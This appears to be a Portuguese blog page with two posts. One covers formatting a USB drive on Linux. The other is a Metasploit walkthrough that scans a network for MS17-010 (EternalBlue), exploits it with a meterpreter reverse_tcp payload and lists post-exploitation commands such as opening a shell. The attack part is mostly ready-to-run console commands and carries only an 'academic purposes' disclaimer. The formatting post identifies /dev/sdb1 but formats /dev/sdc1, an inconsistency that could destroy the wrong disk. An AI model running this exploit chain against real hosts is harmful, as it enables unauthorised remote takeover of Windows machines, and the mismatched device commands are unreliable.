Como formatar um pen drive no Linux

Primeiro vamos identificar nosso pendrive com o comando mount A saida do comando sera portal on /run/user/1000/doc type fuse.portal (rw,nosuid,nodev,relatime,user_id=1000,group_id=1000) tmpfs on /run/snapd/ns type tmpfs (rw,nosuid,nodev,noexec,relatime,size=1626292k,mode=755) nsfs on /run/snapd/ns/whatsdesk.mnt type nsfs (rw) /dev/sdb1 on /media/junior/538B-BA22 type vfat (rw,nosuid,nodev,relatime,uid=1000,gid=1000,fmask=0022,dmask=0022,codepage=437,iocharset=ascii,shortname=mixed,showexec,utf8,flush,errors=remount-ro,uhelper=udisks2) Assim que identificamos (no meu caso foi o /dev/sdb1) iremos desmontar o pendrive sudo umount /dev/sdb1 Para o sistema de arquivos vFAT (FAT32) sudo mkfs.vfat /dev/sdc1 Para sistema de arquivos NTFS sudo mkfs.ntfs /dev/sdc1 Para o sistema de arquivos EXT4 sudo mkfs.ext4 /dev/sdc1 Agora vamos criar nosso pendrive com um vmware (como exemplo) sudo dd if=/home/junior/Downloads/isos/vmware7.iso of=/dev/sdb status=progress && sync

Varredura na Rede (para detectar o eternalblue)

Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue.


A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado
https://www.kali.org/downloads/



Comandos dentro do Kali Linux
# service postgresql start

# msfconsole
msf5 > search smb_ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

Quando a vulnerabilidade for identificada teremos a saida
"Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86"

msf5 auxiliary(scanner/smb/smb_ms17_010) > back
msf5 > search ms17_010_eternalblue
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.0.2.15
msf5 exploit(windows/smb/ms17_010_eternalblue) > show missing
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

Pos invasão
sysinfo
getuid
shell

E por ai vai...

Lembrando que esse conteúdo serve apenas para fins acadêmicos, toda e qualquer acesso informático sem autorização É CRIME!!!

Comentários

Postagens mais visitadas deste blog

Instalando e Atualizando GLPI no Debian Jessie (8.7.1)